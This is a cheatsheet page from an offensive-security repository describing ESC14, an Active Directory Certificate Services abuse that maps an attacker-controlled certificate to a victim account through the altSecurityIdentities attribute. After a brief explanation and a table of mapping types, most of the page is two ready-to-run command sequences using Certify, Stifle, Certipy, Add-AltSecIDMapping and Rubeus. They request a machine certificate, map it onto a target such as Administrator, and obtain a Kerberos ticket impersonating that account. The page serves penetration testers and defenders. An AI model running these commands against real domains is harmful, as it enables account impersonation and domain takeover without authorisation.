daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc14.md (4490B)


      1 ---
      2 title: "Active Directory - Certificate ESC14"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc14.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc14.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC14
     12 
     13 ## ESC14 - altSecurityIdentities
     14 
     15 > ESC14 is an Active Directory Certificate Services (ADCS) abuse technique that leverages the altSecurityIdentities attribute to perform explicit certificate mappings. This attribute allows administrators to associate specific certificates with user or computer accounts for authentication purposes. However, if an attacker gains write access to this attribute, they can add a mapping to a certificate they control, effectively impersonating the targeted account.
     16 
     17 Domain administrators can manually associate certificates with a user in Active Directory by configuring the altSecurityIdentities attribute of the user object. This attribute supports six different values, categorized into three weak (insecure) mappings and three strong mappings.
     18 
     19 In general, a mapping is considered strong if it relies on unique, non-reusable identifiers. Conversely, mappings based on usernames or email addresses are classified as weak, as these identifiers can be easily reused or changed.
     20 
     21 | Mapping                | Example                            | Type   | Remarks       |
     22 | ---------------------- | ---------------------------------- | ------ | ------------- |
     23 | X509IssuerSubject      | `X509:<I>IssuerName<S>SubjectName` | Weak   | /             |
     24 | X509SubjectOnly        | `X509:<S>SubjectName`              | Weak   | /             |
     25 | X509RFC822             | `X509:<RFC822>user@contoso.com`    | Weak   | Email Address |
     26 | X509IssuerSerialNumber | `X509:<I>IssuerName<SR>1234567890` | Strong | Recommended   |
     27 | X509SKI                | `X509:<SKI>123456789abcdef`        | Strong | /             |
     28 | X509SHA1PublicKey      | `X509:<SHA1-PUKEY>123456789abcdef` | Strong | /             |
     29 
     30 **Requirements**:
     31 
     32 * Ability to modify the attribute `altSecurityIdentitites` of an account.
     33 
     34 **Exploitation**:
     35 
     36 **Technique 1** with [GhostPack/Certify](https://github.com/GhostPack/Certify) and [logangoins/Stifle](https://github.com/logangoins/Stifle)
     37 
     38 ```ps1
     39 # the certificate requested must be a machine account certificate
     40 Certify.exe request /ca:lab.lan\lab-dc01-ca /template:Machine /machine
     41 
     42 # convert to base64 .pfx format:
     43 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export | base64 -w 0
     44 
     45 # generate a certificate mapping string and write it to the target objects altSecurityIdentities attribute:
     46 Stifle.exe add /object:target /certificate:MIIMrQI... /password:P@ssw0rd
     47 
     48 # request a TGT using PKINIT authentication, effectively impersonating the target user with Rubeus:
     49 Rubeus.exe asktgt /user:target /certificate:MIIMrQI... /password:P@ssw0rd
     50 ```
     51 
     52 **Technique 2** using [Deloitte-OffSecResearch/Certipy](https://github.com/Deloitte-OffSecResearch/Certipy) and [JonasBK/Add-AltSecIDMapping.ps1](https://github.com/JonasBK/Powershell/blob/master/Add-AltSecIDMapping.ps1)
     53 
     54 ```ps1
     55 # request a machine account certificate
     56 addcomputer.py -method LDAPS -computer-name 'ESC13$' -computer-pass 'P@ssw0rd' -dc-host dc.lab.local 'lab.local/kuma'
     57 certipy req -target dc.lab.local -dc-ip 10.10.10.10 -u "ESC13$@lab.local" -p 'P@ssw0rd' -template Machine -ca LAB-CA
     58 
     59 # extract Serial Number and Issuer, to configure a strong mapping
     60 certutil -Dump -v .\esc13.pfx
     61 Get-X509IssuerSerialNumberFormat -SerialNumber "<serial-number>" -IssuerDistinguishedName "<issuer-cn>"
     62 
     63 # add mapping to the Administrator user
     64 Add-AltSecIDMapping -DistinguishedName "CN=Administrator,CN=Users,DC=lab,DC=local" -MappingString "<output-x509-issuer-serial-number>"
     65 
     66 # request TGT for Administrator
     67 Rubeus.exe asktgt /user:Administrator /certificate:esc13.pfx /domain:lab.local /dc:dc.lab.local /show /nowrap
     68 ```
     69 
     70 ## References
     71 
     72 * [ADCS ESC14 Abuse Technique - Jonas Bülow Knudsen - February 28, 2024](https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9)
     73 * [Exploitation de l’AD CS : ESC12, ESC13 et ESC14 - Guillon Bony Rémi - February, 2025](https://connect.ed-diamond.com/misc/mischs-031/exploitation-de-l-ad-cs-esc12-esc13-et-esc14)
     74 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)